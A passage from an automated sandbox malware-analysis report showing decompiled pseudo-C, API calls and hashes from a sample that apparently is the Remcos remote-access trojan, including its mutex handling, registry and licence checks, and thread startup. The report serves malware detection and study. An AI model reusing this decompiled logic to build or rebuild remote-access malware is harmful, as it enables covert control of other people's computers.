                              • Opcode Fuzzy Hash: d8b27bcf48bc9654abab763dba499bbd76732c53fd0bf8c262b8ba2a6f0e4add
                              • Instruction Fuzzy Hash: 3C012532500209FBDF125F90DC02EEE7F62EF08755F004126FE0426161CA3AC971EB99
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00441129, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39timeCOMMON
                              Download Yara Rule
                              APIs
                              • GetTimeFormatW.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,00000000,?,?,00000000,004401EB,?,00000000,00401D19), ref: 00441182
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.937867942.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: FormatTime
                              • String ID: GetTimeFormatEx$@
                              • API String ID: 3606616251-597012884
                              • Opcode ID: e18defe2a157fc6ceb45431b8018b2d218c0bef47ea8d3fbbce7efe0c819ccca
                              • Instruction ID: 597dd883ab71028faa77f39812b87aa423b0666660f34cf126ad643169d29e88
                              • Opcode Fuzzy Hash: e18defe2a157fc6ceb45431b8018b2d218c0bef47ea8d3fbbce7efe0c819ccca
                              • Instruction Fuzzy Hash: DCF0C83164021CFBDF126F61DC02EAF7F21EF08B51F10452AFE05172A1CA798D259B99
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00441199, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON
                              Download Yara Rule
                              C-Code - Quality: 39%
                              			E00441199(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _t7;
				void* _t20;
				intOrPtr* _t23;
				signed int _t25;

				_t20 = __edx;
				_t16 = __ecx;
				_push(__ecx);
				_t7 =  *0x46a00c; // 0x7df2b874
				_v8 = _t7 ^ _t25;
				_t23 = L00440C46(0x11, "GetUserDefaultLocaleName", 0x4590a4, "GetUserDefaultLocaleName");
				if(_t23 == 0) {
					E004412C5(__ebx, _t16, _t20, __edi, _t23, __eflags, GetUserDefaultLCID(), _a4, _a8, 0);
				} else {
					 *0x45346c(_a4, _a8);
					 *_t23();
				}
				return L0042F61B(_v8 ^ _t25);
			}








                              0x00441199
                              0x00441199
                              0x0044119e
                              0x0044119f
                              0x004411a6
                              0x004411c0
                              0x004411c7
                              0x004411ea
                              0x004411c9
                              0x004411d1
                              0x004411d7
                              0x004411d7
                              0x004411fd

                              APIs
                              • GetUserDefaultLCID.KERNEL32(00000055,?,00000000,00448438,?,00000055,00000050), ref: 004411E3
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.937867942.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: DefaultUser
                              • String ID: GetUserDefaultLocaleName$@
                              • API String ID: 3358694519-2432190263
                              • Opcode ID: 90c388354acc68b76619c00604a582a4408c9a1ccc77837c827a5096964a56ca
                              • Instruction ID: 3ac9f703888ec721985dbf6bd802d6cf8197e55589d78a152d54f94c28d6ea82
                              • Opcode Fuzzy Hash: 90c388354acc68b76619c00604a582a4408c9a1ccc77837c827a5096964a56ca
                              • Instruction Fuzzy Hash: 90F02B30600218FBDB106F61DC02E5E7FA0EF04B11F104466FD05561A2DA758E149BDD
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00441262, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMON
                              Download Yara Rule
                              C-Code - Quality: 25%
                              			E00441262(void* __ecx, void* __esi, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				signed int _t5;
				intOrPtr* _t18;
				signed int _t20;

				_t13 = __ecx;
				_push(__ecx);
				_t5 =  *0x46a00c; // 0x7df2b874
				_v8 = _t5 ^ _t20;
				_push(__esi);
				_t18 = L00440C46(0x15, "IsValidLocaleName", 0x4590d0, "IsValidLocaleName");
				if(_t18 == 0) {
					IsValidLocale(L004413B7(_t13, _t18, __eflags, _a4, 0), 1);
				} else {
					 *0x45346c(_a4);
					 *_t18();
				}
				return L0042F61B(_v8 ^ _t20);
			}







                              0x00441262
                              0x00441267
                              0x00441268
                              0x0044126f
                              0x00441272
                              0x00441289
                              0x00441290
                              0x004412ae
                              0x00441292
                              0x00441297
                              0x0044129d
                              0x0044129d
                              0x004412c2

                              APIs
                              • IsValidLocale.KERNEL32(00000000,0043CFD0,00000000,00000001,?,?,0043CFD0,?,?,0043C9B0,?,00000004), ref: 004412AE
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.937867942.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: LocaleValid
                              • String ID: IsValidLocaleName$@
                              • API String ID: 1901932003-2778040366
                              • Opcode ID: af6bfaf10eedc7b2d13639744446c0f101df4d5affd74620e5c0cda37b3ac205
                              • Instruction ID: 51e1be3ffe8f4d9107f84abeff18eb9e3ab6bbbe641bbbca65fbd3cae13f37de
                              • Opcode Fuzzy Hash: af6bfaf10eedc7b2d13639744446c0f101df4d5affd74620e5c0cda37b3ac205
                              • Instruction Fuzzy Hash: 23F05930640708F7DB106F20DC02FAE7B54DB00B12F10016AFD05B72D1DAB88D148A9D
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00441200, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                              Download Yara Rule
                              C-Code - Quality: 20%
                              			E00441200(void* __ecx, void* __esi, void* __eflags, struct _CRITICAL_SECTION* _a4, long _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _t8;
				intOrPtr* _t20;
				signed int _t22;

				_push(__ecx);
				_t8 =  *0x46a00c; // 0x7df2b874
				_v8 = _t8 ^ _t22;
				_t20 = L00440C46(0x14, "InitializeCriticalSectionEx", 0x4590c8, 0x4590d0);
				if(_t20 == 0) {
					InitializeCriticalSectionAndSpinCount(_a4, _a8);
				} else {
					 *0x45346c(_a4, _a8, _a12);
					 *_t20();
				}
				return L0042F61B(_v8 ^ _t22);
			}







                              0x00441205
                              0x00441206
                              0x0044120d
                              0x00441227
                              0x0044122e
                              0x0044124b
                              0x00441230
                              0x0044123b
                              0x00441241
                              0x00441241
                              0x0044125f

                              APIs
                              • InitializeCriticalSectionAndSpinCount.KERNEL32(00000FA0,-00000020,0044437F,-00000020,00000FA0,00000000,?,?), ref: 0044124B
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.937867942.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: CountCriticalInitializeSectionSpin
                              • String ID: InitializeCriticalSectionEx$@
                              • API String ID: 2593887523-1288605549
                              • Opcode ID: fa53c4b1efa0943462c88759d19cc67ec6d1fc6053c53cb60ae7065c619b4311
                              • Instruction ID: d51398674981bb72eabf597e0de5951d7e9872e17945c585b36a5d9ca4153329
                              • Opcode Fuzzy Hash: fa53c4b1efa0943462c88759d19cc67ec6d1fc6053c53cb60ae7065c619b4311
                              • Instruction Fuzzy Hash: 98F02431600218FBCB115F50DC02EAEBF60EF04712B10406AFC096A271DA758E24DA99
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Analysis Process: mobsync.exe PID: 4108 Parent PID: 7112 mobsync.exeCOMMON

                              Executed Functions

                              Function 0043B789, Relevance: 4.5, APIs: 3, Instructions: 20COMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E0043B789(int _a4) {
				void* _t14;
				void* _t16;

				if(E00441445(_t14, _t16) != 0 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
					TerminateProcess(GetCurrentProcess(), _a4);
				}
				E0043B80E(_t14, _t16, _a4);
				ExitProcess(_a4);
			}





                              0x0043b795
                              0x0043b7b1
                              0x0043b7b1
                              0x0043b7ba
                              0x0043b7c3

                              APIs
                              • GetCurrentProcess.KERNEL32(0000000C,?,0043B75F,0000000C,00468178,0000000C), ref: 0043B7AA
                              • TerminateProcess.KERNEL32(00000000,?,0043B75F,0000000C,00468178,0000000C), ref: 0043B7B1
                              • ExitProcess.KERNEL32 ref: 0043B7C3
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: Process$CurrentExitTerminate
                              • String ID:
                              • API String ID: 1703294689-0
                              • Opcode ID: d2efcfef409a5a836f4afb556700df06fc3074a776be1555a25bdbd19de9e5a4
                              • Instruction ID: 91f09eb10ad8882fafd7c3a50809be48a5acae071be7bd6b9a99ec4421295efe
                              • Opcode Fuzzy Hash: d2efcfef409a5a836f4afb556700df06fc3074a776be1555a25bdbd19de9e5a4
                              • Instruction Fuzzy Hash: D9E0B631400648ABCF12AF55DD0AA993B69EF94787F004065FA058A632CB39DE92CB98
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0042F1CD, Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E0042F1CD() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E0042F1D9); // executed
				return _t1;
			}




                              0x0042f1d2
                              0x0042f1d8

                              APIs
                              • SetUnhandledExceptionFilter.KERNELBASE(Function_0002F1D9,0042EF00), ref: 0042F1D2
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: ExceptionFilterUnhandled
                              • String ID:
                              • API String ID: 3192549508-0
                              • Opcode ID: 229e7487e4b619eafed6bfeacb774be22e42fe1f315c3811e96dc54caa77ac2a
                              • Instruction ID: cbbfc4c934c794425517924e3dd5babbab0d2174eef7e37b5e0b749d7271a00e
                              • Opcode Fuzzy Hash: 229e7487e4b619eafed6bfeacb774be22e42fe1f315c3811e96dc54caa77ac2a
                              • Instruction Fuzzy Hash:
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0040C641, Relevance: 53.3, APIs: 15, Strings: 15, Instructions: 769synchronizationCOMMON
                              Download Yara Rule
                              C-Code - Quality: 89%
                              			E0040C641(void* __edx, void* __eflags, char* _a12) {
				char _v524;
				char _v700;
				char _v720;
				char _v724;
				char _v728;
				char _v744;
				char _v756;
				char _v760;
				char _v772;
				struct _SECURITY_ATTRIBUTES* _v776;
				signed int _v780;
				char _v784;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t69;
				void* _t76;
				void** _t83;
				void* _t87;
				CHAR* _t90;
				long _t92;
				int _t94;
				char _t97;
				void* _t98;
				void* _t102;
				void* _t118;
				void* _t119;
				char _t127;
				char* _t129;
				signed char* _t131;
				signed char* _t133;
				void* _t136;
				void* _t138;
				void* _t155;
				intOrPtr _t157;
				void* _t158;
				CHAR* _t174;
				intOrPtr* _t177;
				void* _t179;
				void* _t185;
				char* _t188;
				void* _t191;
				char* _t195;
				void* _t202;
				signed short* _t206;
				void* _t207;
				void* _t208;
				signed int _t209;
				void* _t215;
				CHAR* _t221;
				void* _t223;
				char* _t226;
				char* _t228;
				intOrPtr* _t230;
				void* _t232;
				intOrPtr* _t237;
				intOrPtr* _t241;
				void* _t243;
				void* _t251;
				void* _t262;
				void* _t265;
				struct _SECURITY_ATTRIBUTES* _t266;
				int _t269;
				char* _t352;
				signed int _t374;
				signed int _t378;
				int _t380;
				signed int _t386;
				signed int _t389;
				intOrPtr _t419;
				void* _t429;
				void* _t431;
				signed int _t447;
				void* _t450;
				char* _t457;
				void* _t458;
				char* _t461;
				void* _t463;
				void* _t468;
				char* _t473;
				intOrPtr* _t477;
				void* _t480;
				void* _t481;
				void* _t482;
				signed int _t488;
				void* _t491;
				void* _t492;
				void* _t493;
				void* _t495;
				void* _t501;
				void* _t502;

				_t440 = __edx;
				_push(_t265);
				L0040CFBE( &_v724, __edx, __eflags);
				_t491 = (_t488 & 0xfffffff8) - 0x2f4;
				E004020CC(_t265, _t491, __edx, __eflags, 0x46c59c);
				_t492 = _t491 - 0x18;
				E004020CC(_t265, _t492, __edx, __eflags,  &_v728);
				_t69 = L00416DD0( &_v756, __edx);
				_t493 = _t492 + 0x30;
				E0040D7F8(__edx, _t69);
				L00401E54( &_v760, __edx);
				_t281 = _a12;
				if( *_a12 != 0x2d) {
					L6:
					_t457 = 0x46c578;
					__eflags =  *((char*)(L00401F75(L00401E29(0x46c578, _t440, __eflags, 3))));
					 *0x46bb05 = __eflags != 0;
					_t76 = E0040530D(_t265,  &_v756, E004075E8( &_v780, "Software\\", __eflags, L00401E29(0x46c578, _t440, __eflags, 0xe)), 0x46c578, __eflags, "\\");
					_t467 = 0x46c518;
					L00401FB1(0x46c518, _t75, 0x46c518, _t76);
					L00401FA7();
					L00401FA7();
					_t266 = 0;
					L00401E29(0x46c578, _t75, __eflags, 0x32);
					__eflags =  *(E004051EA(0));
					 *0x46bd4e = __eflags != 0;
					L00401E29(0x46c578, _t75, __eflags, 0x33);
					_t83 = E004051EA(0);
					__eflags =  *_t83;
					 *0x46bd4f =  *_t83 != 0;
					__eflags =  *0x46bd4e - _t266; // 0x0
					if(__eflags == 0) {
						L8:
						_v776 = _t266;
						_t468 = OpenMutexA(0x100000, _t266, "Remcos_Mutex_Inj");
						__eflags = _t468;
						if(_t468 != 0) {
							WaitForSingleObject(_t468, 0xea60);
							CloseHandle(_t468);
						}
						_t443 = L00401F75(0x46c518); // executed
						_t87 = E00410275(_t86, "Inj",  &_v776); // executed
						__eflags = _t87;
						if(__eflags != 0) {
							_t443 = L00401F75(0x46c518);
							E004106D2(_t256, __eflags, "Inj");
						}
						L00401F8D(0x46c548, L00401E29(_t457, _t443, __eflags, 0xe));
						_t90 = L00401F75(0x46c548);
						_t458 = 0;
						_t269 = 1;
						CreateMutexA(0, 1, _t90); // executed
						_t92 = GetLastError();
						__eflags = _t92 - 0xb7;
						if(_t92 == 0xb7) {
							L45:
							L00401FA7();
							_t94 = _t269;
							goto L5;
						} else {
							E0040D072();
							GetModuleFileNameW(0, 0x46bb08, 0x104);
							_t97 = L00416F6C(0x46c548);
							_push(0x46c548);
							_t444 = 0x80000002;
							 *0x46beb4 = _t97;
							_t98 = E004102D2( &_v772, 0x80000002, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", "ProductName");
							_t495 = _t493 + 0xc;
							L00401FB1(0x46c5b4, 0x80000002, 0x46c5b4, _t98);
							L00401FA7();
							__eflags =  *0x46beb4;
							if( *0x46beb4 == 0) {
								_push(" (32 bit)");
							} else {
								_push(" (64 bit)");
							}
							E004059B5(_t269, 0x46c5b4, _t458);
							_t102 =  *0x46bd24; // 0x0
							__eflags = _t102;
							if(_t102 != 0) {
								 *0x46a9d0 =  *_t102();
							}
							_t473 = 0x46c578;
							__eflags = _v776 - _t458;
							if(__eflags == 0) {
								_t429 = L00401E29(0x46c578, _t444, __eflags, 0x2e);
								__eflags =  *((char*)(L00401F75(_t429)));
								if(__eflags != 0) {
									__eflags =  *0x46bd24 - _t458; // 0x0
									if(__eflags != 0) {
										__eflags =  *0x46a9d0 - _t458; // 0x2
										if(__eflags == 0) {
											_t444 = L00401F75(0x46c518);
											_t251 = E0041022B(0x46c518, _t250, "origmsc");
											_pop(_t431);
											__eflags = _t251;
											if(__eflags == 0) {
												L00405F2A(_t269, _t431, _t444);
											}
										} else {
											_push(_t429);
											_push(_t429);
											__eflags = L0040AAB0() - 0xffffffff;
											if(__eflags == 0) {
												E00406024(__eflags);
											}
										}
									}
								}
							}
							__eflags =  *((char*)(L00401F75(L00401E29(_t473, _t444, __eflags, 0x27))));
							if(__eflags != 0) {
								E0040D797();
							}
							L00409DCB(_t269, 0x46c4e8, L00401F75(L00401E29(_t473, _t444, __eflags, 0xb)));
							__eflags =  *((char*)(L00401F75(L00401E29(_t473, _t444, __eflags, 4))));
							 *0x46bb06 = __eflags != 0;
							__eflags =  *((char*)(L00401F75(L00401E29(_t473, _t444, __eflags, 5))));
							 *0x46baff = __eflags != 0;
							__eflags =  *((char*)(L00401F75(L00401E29(_t473, _t444, __eflags, 8))));
							 *0x46bb04 = __eflags != 0;
							__eflags =  *((char*)(L00401F75(L00401E29(_t473, _t444, __eflags, 3))));
							if(__eflags != 0) {
								_t237 = L00401F75(L00401E29(_t473, _t444, __eflags, 0x30));
								_t24 = _t237 + 2; // 0x2
								_t444 = _t24;
								do {
									_t419 =  *_t237;
									_t237 = _t237 + 2;
									__eflags = _t419 - _t458;
								} while (_t419 != _t458);
								__eflags = _t237 - _t444;
								if(__eflags != 0) {
									_t241 = L00401F75(L00401E29(_t473, _t444, __eflags, 9));
									_t243 = L00401F75(L00401E29(0x46c578, _t444, __eflags, 0x30));
									_t444 =  *_t241;
									L00401EDA(0x46c530,  *_t241, _t241, E004179B3( &_v780,  *_t241, _t243));
									L00401ED0();
									_t473 = 0x46c578;
								}
							}
							__eflags = _v776 - _t458;
							if(_v776 != _t458) {
								E00431810(_t458,  &_v524, _t458, 0x208);
								_t118 = E00402469();
								_t119 = L00401F75(0x46c560);
								_t445 = L00401F75(0x46c518);
								E00410420(_t121, "exepath",  &_v524, 0x208, _t119, _t118);
								_t493 = _t495 + 0x20;
								L00409DCB(_t269, 0x46c500,  &_v524);
								_t461 = 0x46c578;
								goto L47;
							} else {
								__eflags =  *0x46bb05;
								if(__eflags == 0) {
									L00409DCB(_t269, 0x46c500, 0x46bb08);
								} else {
									_t226 = L00401F75(L00401E29(_t473, _t444, __eflags, 0x1e));
									_t228 = L00401F75(L00401E29(_t473, _t444, __eflags, 0xc));
									_t230 = L00401F75(L00401E29(0x46c578, _t444, __eflags, 9));
									__eflags =  *_t226;
									__eflags =  *_t228;
									_t473 = 0x46c578;
									_t232 = L00401F75(L00401E29(0x46c578, _t444,  *_t228, 0xa));
									L0040AD0A( *_t230, L00401F75(L00401E29(0x46c578, _t444, __eflags, 0x30)), _t232, ((_t229 & 0xffffff00 |  *_t226 != 0x00000000) & 0 | __eflags != 0x00000000) & 0x000000ff, (_t229 & 0xffffff00 |  *_t226 != 0x00000000) & 0x000000ff);
									_t495 = _t495 + 0xc;
									_t269 = 1;
									_t458 = 0;
								}
								_t202 = E00402469();
								_t447 = 2;
								_t386 =  ~(0 | __eflags > 0x00000000) | (_t202 + 0x00000001) * _t447;
								_push(_t386);
								_v780 = _t386;
								_t482 = L0042EE1E(_t386, (_t202 + 1) * _t447 >> 0x20, _t473, __eflags);
								__eflags = _t482;
								if(_t482 == 0) {
									_t482 = _t458;
								} else {
									E00431810(_t458, _t482, _t458, _v780);
									_t495 = _t495 + 0xc;
								}
								_t206 = L00401ECB(0x46c500);
								_t450 = _t482 - _t206;
								__eflags = _t450;
								_t463 = 2;
								do {
									_t389 =  *_t206 & 0x0000ffff;
									 *(_t206 + _t450) = _t389;
									_t206 = _t206 + _t463;
									__eflags = _t389;
								} while (_t389 != 0);
								_push(_t389);
								_t207 = E00402469();
								_t208 = L00401F75(0x46c560);
								_t209 = E00402469();
								E00410670(L00401F75(0x46c518), __eflags, "exepath", _t482, 2 + _t209 * 2, _t208, _t207);
								L0042EE27(_t482);
								_t461 = 0x46c578;
								_push(_t269);
								_t215 = L00401F75(L00401E29(0x46c578, _t211, __eflags, 0x34));
								_t501 = _t495 + 0x1c - 0x18;
								E00402064(_t269, _t501, _t215);
								_push("licence");
								E00410497(0x46c518, L00401F75(0x46c518));
								_t493 = _t501 + 0x20;
								L00401E29(0x46c578, _t217, __eflags, 0xd);
								_t445 = "0";
								__eflags = L0040EE79(__eflags);
								if(__eflags == 0) {
									L47:
									_t127 = E00436079(_t125, L00401F75(L00401E29(_t461, _t445, __eflags, 0x28)));
									 *0x46bb07 = _t127;
									__eflags = _t127 - 2;
									if(_t127 != 2) {
										__eflags = _t127 - _t269;
										if(__eflags == 0) {
											_t380 = 0;
											__eflags = 0;
											goto L51;
										}
									} else {
										_t380 = _t269;
										L51:
										E004188B1(_t269, _t380, _t445);
										__eflags = 0;
										CreateThread(0, 0, E00418680, 0, 0, 0);
									}
									_t129 = L00401F75(L00401E29(_t461, _t445, __eflags, 0x37));
									_t131 = L00401F75(L00401E29(_t461, _t445, __eflags, 0x10));
									_t133 = L00401F75(L00401E29(_t461, _t445, __eflags, 0xf));
									__eflags =  *_t129;
									_t467 = 0x46c578;
									_t136 = E00436079(_t134, L00401F75(L00401E29(0x46c578, _t445,  *_t129, 0x36)));
									_t138 = L00401F75(L00401E29(0x46c578, _t445, __eflags, 0x11));
									E0040846F(_t131,  *_t133 & 0x000000ff,  *_t131 & 0x000000ff, L00401F75(L00401E29(0x46c578, _t445, __eflags, 0x31)), _t138, _t136, (_t132 & 0xffffff00 | __eflags != 0x00000000) & 0x000000ff);
									__eflags =  *((intOrPtr*)(L00401F75(L00401E29(0x46c578, _t445, __eflags, 0x14)))) - 1;
									if(__eflags != 0) {
										_t457 = CreateThread;
									} else {
										_t191 = 2;
										_t481 = L0042EB70(_t445, 0x46c578, __eflags, _t191);
										 *_t481 = 0;
										_t378 = L00401E29(0x46c578, _t445, __eflags, 0x35);
										_t195 = L00401F75(_t378);
										_t457 = CreateThread;
										__eflags =  *_t195;
										 *((char*)(_t481 + 1)) = _t378 & 0xffffff00 | __eflags != 0x00000000;
										CreateThread(0, 0, E004152D7, _t481, 0, 0);
										_t467 = 0x46c578;
									}
									__eflags =  *((intOrPtr*)(L00401F75(L00401E29(_t467, _t445, __eflags, 0x16)))) - 1;
									if(__eflags == 0) {
										_t185 = 2;
										_t480 = L0042EB70(_t445, _t467, __eflags, _t185);
										 *_t480 = 1;
										_t374 = L00401E29(0x46c578, _t445, __eflags, 0x35);
										_t188 = L00401F75(_t374);
										__eflags =  *_t188;
										__eflags = 0;
										 *((char*)(_t480 + 1)) = _t374 & 0xffffff00 |  *_t188 != 0x00000000;
										CreateThread(0, 0, E004152D7, _t480, 0, 0);
										_t467 = 0x46c578;
									}
									__eflags =  *((intOrPtr*)(L00401F75(L00401E29(_t467, _t445, __eflags, 0x23)))) - 1;
									if(__eflags == 0) {
										 *0x46ba75 = 1;
										_t177 = L00401F75(L00401E29(_t467, _t445, __eflags, 0x25));
										_t179 = L00401F75(L00401E29(0x46c578, _t445, __eflags, 0x26));
										_t445 =  *_t177;
										L00401EDA(0x46c0e0,  *_t177, _t177, E00417967( &_v780,  *_t177, _t179));
										L00401ED0();
										__eflags = 0;
										CreateThread(0, 0, 0x401bad, 0, 0, 0);
										_t467 = 0x46c578;
									}
									__eflags =  *((intOrPtr*)(L00401F75(L00401E29(_t467, _t445, __eflags, 0x2b)))) - 1;
									if(__eflags == 0) {
										_t467 = L00401F75(L00401E29(_t467, _t445, __eflags, 0x2c));
										_t174 = E00436079(_t172, L00401F75(L00401E29(0x46c578, _t445, __eflags, 0x2d)));
										__eflags =  *_t467;
										_t445 = _t174;
										__eflags =  *_t467 != 0;
										L0040AA16(_t174);
									}
									L00401EDA(0x46c584, _t445, _t467, E004166F6( &_v772, _t457, __eflags));
									_t352 =  &_v776;
									L00401ED0();
									_t155 =  *0x46bd18; // 0x0
									_t266 = 0;
									__eflags = _t155;
									if(_t155 != 0) {
										 *_t155(0);
									}
									CreateThread(_t266, _t266, E0040D455, _t266, _t266, _t266);
									__eflags =  *0x46bd4e;
									if( *0x46bd4e != 0) {
										CreateThread(_t266, _t266, E0040F4B7, _t266, _t266, _t266);
									}
									__eflags =  *0x46bd4f;
									if( *0x46bd4f != 0) {
										CreateThread(_t266, _t266, E0040F9D5, _t266, _t266, _t266);
									}
									_t157 =  *0x46a9d0; // 0x2
									_t158 = _t157 - _t266;
									__eflags = _t158;
									if(__eflags == 0) {
										goto L71;
									} else {
										__eflags = _t158 - 1;
										if(__eflags == 0) {
											_push("Administrator");
											goto L72;
										}
									}
									goto L73;
								} else {
									_t221 = L00401E29(0x46c578, "0", __eflags, 0xd);
									_t502 = _t493 - 0x18;
									_t445 = _t221;
									L00416C32(_t502, _t221);
									_t223 = E0040D1AD(__eflags);
									_t493 = _t502 + 0x18;
									__eflags = _t223 - _t269;
									if(__eflags != 0) {
										goto L47;
									} else {
										_t269 = 3;
										goto L45;
									}
								}
							}
						}
					} else {
						_v780 = 0;
						_t262 = E00410275(L00401F75(0x46c518), "WD",  &_v780);
						__eflags = _t262;
						if(_t262 != 0) {
							E004106D2(L00401F75(0x46c518), __eflags, "WD");
							E0040F785();
							L71:
							_push("User");
							L72:
							E004075C4(_t266, _t493 - 0x18, "Access level: ", _t457, __eflags, E00402064(_t266,  &_v776));
							E00402064(_t266, _t493 - 4, "[Info]");
							E004165D8(_t266, _t457);
							_t352 =  &_v784;
							L00401FA7();
							L73:
							E00411319();
							asm("int3");
							_push(_t467);
							_t477 = _t352 + 0x68;
							E0040D8B5(_t266, _t477, _t477);
							_t281 = _t477;
							 *_t281 = 0x4607a0;
							 *_t281 = 0x46075c;
							return L0042FE13(_t281);
						} else {
							goto L8;
						}
					}
				} else {
					__eflags =  *((char*)(__ecx + 1)) - 0x6c;
					if(__eflags != 0) {
						goto L6;
					} else {
						__eax =  *(__ecx + 2) & 0x000000ff;
						__eflags = __al;
						if(__eflags != 0) {
							goto L6;
						} else {
							_push(__ecx);
							_push(__ecx);
							__ecx =  &_v700;
							__eax = E0040D8E4( &_v700, __edx, __eflags, "licence_code.txt", 2);
							__ecx = 0x46c578;
							__ecx = L00401E29(0x46c578, __edx, __eflags, 0x34);
							__edx = __eax;
							__ecx =  &_v720;
							__eax = L0040EC5B( &_v720, __edx, __eflags);
							__ecx =  &_v720;
							__eax = E0040D895( &_v720, __edx, __eflags);
							__ecx =  &_v720;
							L74();
							__ecx =  &_v744;
							L00401FA7() = 0;
							__eax = 1;
							__eflags = 1;
							L5:
							return _t94;
						}
					}
				}
			}































































































                              0x0040c641
                              0x0040c651
                              0x0040c654
                              0x0040c659
                              0x0040c663
                              0x0040c668
                              0x0040c672
                              0x0040c67b
                              0x0040c680
                              0x0040c684
                              0x0040c68d
                              0x0040c692
                              0x0040c698
                              0x0040c6ff
                              0x0040c6ff
                              0x0040c71d
                              0x0040c720
                              0x0040c742
                              0x0040c748
                              0x0040c750
                              0x0040c759
                              0x0040c762
                              0x0040c767
                              0x0040c76e
                              0x0040c77f
                              0x0040c781
                              0x0040c788
                              0x0040c78f
                              0x0040c794
                              0x0040c796
                              0x0040c79d
                              0x0040c7a3
                              0x0040c7cb
                              0x0040c7d6
                              0x0040c7e0
                              0x0040c7e2
                              0x0040c7e4
                              0x0040c7ec
                              0x0040c7f3
                              0x0040c7f3
                              0x0040c810
                              0x0040c812
                              0x0040c819
                              0x0040c81b
                              0x0040c825
                              0x0040c827
                              0x0040c82c
                              0x0040c83e
                              0x0040c845
                              0x0040c84d
                              0x0040c84f
                              0x0040c852
                              0x0040c858
                              0x0040c85e
                              0x0040c863
                              0x0040cc1b
                              0x0040cc1f
                              0x0040cc24
                              0x00000000
                              0x0040c869
                              0x0040c869
                              0x0040c879
                              0x0040c87f
                              0x0040c884
                              0x0040c88f
                              0x0040c894
                              0x0040c89d
                              0x0040c8a2
                              0x0040c8ad
                              0x0040c8b6
                              0x0040c8bb
                              0x0040c8c4
                              0x0040c8cd
                              0x0040c8c6
                              0x0040c8c6
                              0x0040c8c6
                              0x0040c8d2
                              0x0040c8d7
                              0x0040c8dc
                              0x0040c8de
                              0x0040c8e2
                              0x0040c8e2
                              0x0040c8e7
                              0x0040c8ec
                              0x0040c8f0
                              0x0040c8fb
                              0x0040c902
                              0x0040c905
                              0x0040c907
                              0x0040c90d
                              0x0040c90f
                              0x0040c915
                              0x0040c939
                              0x0040c93b
                              0x0040c940
                              0x0040c941
                              0x0040c943
                              0x0040c945
                              0x0040c945
                              0x0040c917
                              0x0040c917
                              0x0040c918
                              0x0040c91e
                              0x0040c921
                              0x0040c923
                              0x0040c923
                              0x0040c921
                              0x0040c915
                              0x0040c90d
                              0x0040c905
                              0x0040c95a
                              0x0040c95d
                              0x0040c95f
                              0x0040c95f
                              0x0040c97a
                              0x0040c993
                              0x0040c996
                              0x0040c9ad
                              0x0040c9b0
                              0x0040c9c7
                              0x0040c9ca
                              0x0040c9dd
                              0x0040c9e0
                              0x0040c9ed
                              0x0040c9f2
                              0x0040c9f2
                              0x0040c9f5
                              0x0040c9f5
                              0x0040c9f8
                              0x0040c9fb
                              0x0040c9fb
                              0x0040ca00
                              0x0040ca04
                              0x0040ca11
                              0x0040ca26
                              0x0040ca2b
                              0x0040ca3e
                              0x0040ca47
                              0x0040ca4c
                              0x0040ca4c
                              0x0040ca04
                              0x0040ca51
                              0x0040ca55
                              0x0040cc3a
                              0x0040cc49
                              0x0040cc51
                              0x0040cc6f
                              0x0040cc71
                              0x0040cc76
                              0x0040cc86
                              0x0040cc8b
                              0x00000000
                              0x0040ca5b
                              0x0040ca5b
                              0x0040ca62
                              0x0040caf8
                              0x0040ca68
                              0x0040ca73
                              0x0040ca85
                              0x0040ca9a
                              0x0040ca9f
                              0x0040caa7
                              0x0040caad
                              0x0040cac5
                              0x0040cadf
                              0x0040cae6
                              0x0040cae9
                              0x0040caea
                              0x0040caea
                              0x0040cb02
                              0x0040cb0c
                              0x0040cb14
                              0x0040cb16
